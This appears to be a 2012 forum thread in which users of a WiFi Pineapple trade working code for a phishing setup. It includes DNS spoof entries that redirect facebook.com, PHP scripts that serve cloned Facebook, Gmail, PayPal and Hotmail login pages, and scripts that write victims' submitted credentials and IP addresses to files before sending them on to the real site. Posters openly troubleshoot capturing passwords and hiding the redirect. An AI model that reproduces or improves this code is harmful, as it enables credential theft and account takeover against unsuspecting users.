Redirecting All Pages... Not What I Want.

[stratagem]

I'm trying to redirect facebook.com. Only facebook. Thats not the case tho, every site I go to has /redirect.php at the end with the 503 error.

Spoof

172.16.42.1 *facebook.com
[/CODE]

Landing Page

[CODE]
<html>
<head>
<meta http-equiv="REFRESH" content="0;url=redirect.php">
</head>
<?php
$ref = $_SERVER['HTTP_HOST'];
if (strpos($ref, 'facebook') !== FALSE) include("facebook.html");
elseif (strpos($ref, 'gmail') !== FALSE) include("gmail.htm");
elseif (strpos($ref, 'paypal') !== FALSE) include("paypal.htm");
elseif (strpos($ref, 'hotmail') !== FALSE) include("hotmail.htm");
require('error.php');
?>
<body>
</body>
</html>
[/CODE]

I'm learning PHP as I go so let me know if anything is screwed up.

[Gamehacker953]

<?php
$ref = $_SERVER['HTTP_HOST'];
if (strpos($ref, 'facebook') !== FALSE)
{
include("facebook.htm");
} elseif (strpos($ref, 'gmail') !== FALSE)
{
include("gmail.htm");
} elseif (strpos($ref, 'paypal') !== FALSE)
{
include("paypal.htm");
} elseif (strpos($ref, 'hotmail') !== FALSE)
{
include("hotmail.htm");
} elseif (strpos($ref, ' ') == FALSE)
{
include('error.php');
}
?>

This should work for you. I like to have the PHP indented to see where mistakes are. what you did was not have the "{ }" after the !== FALSE) which made it not work.

EDIT: Also forgot to mention you dont need the HTML code if your using PHP you can always ?> and then add the HTML and reopen <?php to start the php code again hope this post helps

Edited August 19, 2012 by Gamehacker953

[stratagem]

That worked! Thanks.

Is it possible to redirect them to the "True" facebook page after they entered their data instead of going to a 503?

[Gamehacker953]

yea give me a min i just finished setting up my pineapple (got it today :D) and i will post some files :P

[itsm0ld]

That worked! Thanks.

Is it possible to redirect them to the "True" facebook page after they entered their data instead of going to a 503?

yea give me a min i just finished setting up my pineapple (got it today :D) and i will post some files :P

++ I'm interested in the code for a redirect to the real facebook also! I'm sure your going to love your new pineapple!

[Gamehacker953]

++ I'm interested in the code for a redirect to the real facebook also! I'm sure your going to love your new pineapple!

yea i love it just the DNS Spoof isnt working right now its going to the real one -_- but its on the laptop connected to the pineapple using Ethernet

[Gamehacker953]

this is the page that is called from the phishing page. i call it parse.php call it whatever

<?php
$time = date("F j, Y, g:i a");
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("fblog.txt", "a");
fwrite($handle, $_SERVER['REMOTE_ADDR']);
fwrite($handle, "\r\n");
fwrite($handle, $time);
fwrite($handle, "\r\n");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

this should do what you need and you may need a few to change around was trying to get a varible one setup so you have one that logs in different places but it did work well keeps getting a array error getting the $_GET from the page. I am also guessing you know how to make a phising page so i might not post that (dont know if its against forum rules or not. If needed i can PM them to you somehow. Enjoy ^_^ Happy Hacking

Edited August 19, 2012 by Gamehacker953

[stratagem]

Thanks! I'll give it a shot later on. Yea, if you want send me a PM. :D

[rich-]

Thank for the info here.

The first redirect script for facebook works good. The only issues I have are the following:

The hosts: http://www.facebook.com & www.facebook.com work. but https://facebook.com goes directly to the real facebok-page.

the host: https://www.facebook.com goes directly to facebooks real page. but when I enter false login details I get to this page: https://www.facebook...login_attempt=1

However I get a "Error 102 (net::ERR_CONNECTION_REFUSED): The server refused the connection."

When I go to the two first pages (without https) I come to the page: http://www.facebook.com/redirect.php

It works well so I am able to collect the username and password to a file called "login"

however it's not ideal, since it's (to me) obvious it's something fishy going on.

Is there a way to hide that redirect part?

these are my files:

Spoof:

#172.16.42.1 example.com

172.16.42.1 *.facebook.com

172.16.42.1 www.facebook.com

172.16.42.1 http://facebook.com

172.16.42.1 https://facebook.com

172.16.42.1 http://www.facebook.com

172.16.42.1 https://www.facebook.com

Redirect:

<?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, 'facebook') !== FALSE)

{

include("facebook.php");

} elseif (strpos($ref, 'gmail') !== FALSE)

{

include("gmail.htm");

} elseif (strpos($ref, 'paypal') !== FALSE)

{

include("paypal.htm");

} elseif (strpos($ref, 'hotmail') !== FALSE)

{

include("hotmail.htm");

} elseif (strpos($ref, ' ') == FALSE)

{

include('error.php');

}

?>

The guide part I followed for making the spoofed landing page:

Went to facebook.com, right click, got the source code. copied it to a file named facebook.php and placed it in the /www/ folder on the pineapple.

Changed the action to 'action="next.php" and changed the "get" to a "post". saved.

Created a file called next.php with the following information in:

<?php

header("Location: http://www.Facebook.com/login.php ");

$handle = fopen("login", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

Save this as "next.php"

uploaded the next.php file to the /www/ directory on the pineapple as well.

Is there something I have done wrong or missed here?